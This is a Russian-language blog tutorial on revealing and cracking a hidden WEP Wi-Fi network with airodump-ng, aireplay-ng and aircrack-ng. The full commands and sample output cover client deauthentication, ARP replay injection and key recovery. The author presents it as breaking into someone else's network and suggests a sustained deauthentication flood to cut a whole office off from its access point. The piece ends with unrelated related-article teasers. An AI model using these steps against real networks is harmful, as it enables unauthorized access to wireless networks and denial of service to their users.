Сегодня покажу вам, как взламывать скрытую wi-fi сеть. Как всегда, ничего сложного в этом нет. Скрытые wi-fi сети, фильтрация по MAC-адресам все это не спасет вас. На мой взгляд, такие методы защиты не эффективны, но это не значит, что ими нужно пренебрегать!
Все что нужно для получения SSID точки доступа, так это клиент подключенный к ней.
Смотрим список wi-fi сетей в радиусе действия.
# airodump-ng mon0
Красным цветом подчеркнута наша точка доступа (AP), SSID которой скрыт от посторонних. Настраиваемся на нее.
# airodump-ng -c 1 -w wep_hidden --bssid 00:22:B0:BE:75:3D mon0
Теперь делаем деаутентификацию клиента. После чего, если взглянуть в окно консоли где работает airodump-ng, то увидим название нашей wi-fi сети.
Для справки: если взломать точку доступа (AP) не получается, с некоторыми AP такое бывает, но черное дело сделать надо, тогда вместо значения 1 подставляем значение, например 999999. После чего клиент не сможет подключиться к AP, но только до тех пор, пока будет работать эта команда. Следовательно, так можно нарушить работу целого офиса и т.п..
# aireplay-ng -0 1 -a 00:22:B0:BE:75:3D -c 70:F1:A1:72:B4:25 mon0
14:02:32 Waiting for beacon frame (BSSID: 00:22:B0:BE:75:3D) on channel 1 14:02:33 Sending 64 directed DeAuth. STMAC: [70:F1:A1:72:B4:25] [26|26 ACKs]
Деаутентификация прошла успешно. Теперь посмотрим, на работу airodump-ng, как видим wi-fi сеть теперь не скрыта.
Дальше применим вот такой тип атаки.
# aireplay-ng -3 -b 00:22:B0:BE:75:3D -h 70:F1:A1:72:B4:25 mon0
The interface MAC (00:C0:CA:30:85:7A) doesn't match the specified MAC (-h). ifconfig mon0 hw ether 70:F1:A1:72:B4:25 14:04:26 Waiting for beacon frame (BSSID: 00:22:B0:BE:75:3D) on channel 1 Saving ARP requests in replay_arp-1223-140426.cap You should also start airodump-ng to capture replies. Notice: got a deauth/disassoc packet. Is the source MAC associated ? 287654 packets (got 50202 ARP requests and 85270 ACKs), sent 146528 packets...(500 pps)
Опять делаем деаутентификацию клиента. После чего полетят Data-пакеты.
# aireplay-ng -0 1 -a 00:22:B0:BE:75:3D -c 70:F1:A1:72:B4:25 mon0 14:02:32 Waiting for beacon frame (BSSID: 00:22:B0:BE:75:3D) on channel 1 14:02:33 Sending 64 directed DeAuth. STMAC: [70:F1:A1:72:B4:25] [26|26 ACKs]
Когда Data-пакетов накопилось достаточно, можем их расшифровывать.
# aircrack-ng -a 1 -0 wep_hidden.cap
На сегодня все. Если возникнут вопросы, обращайтесь.
Чтобы взломать сеть Wi-Fi с помощью Kali Linux, вам нужна беспроводная карта, поддерживающая режим мониторинга…
Работа с консолью считается более эффективной, чем работа с графическим интерфейсом по нескольким причинам.Во-первых, ввод…
Конечно, вы также можете приобрести подписку на соответствующую услугу, но наличие SSH-доступа к компьютеру с…
С тех пор как ChatGPT вышел на арену, возросла потребность в поддержке чата на базе…
Если вы когда-нибудь окажетесь в ситуации, когда вам нужно взглянуть на спектр беспроводной связи, будь…
Elastic Security стремится превзойти противников в инновациях и обеспечить защиту от новейших технологий злоумышленников. В…
View Comments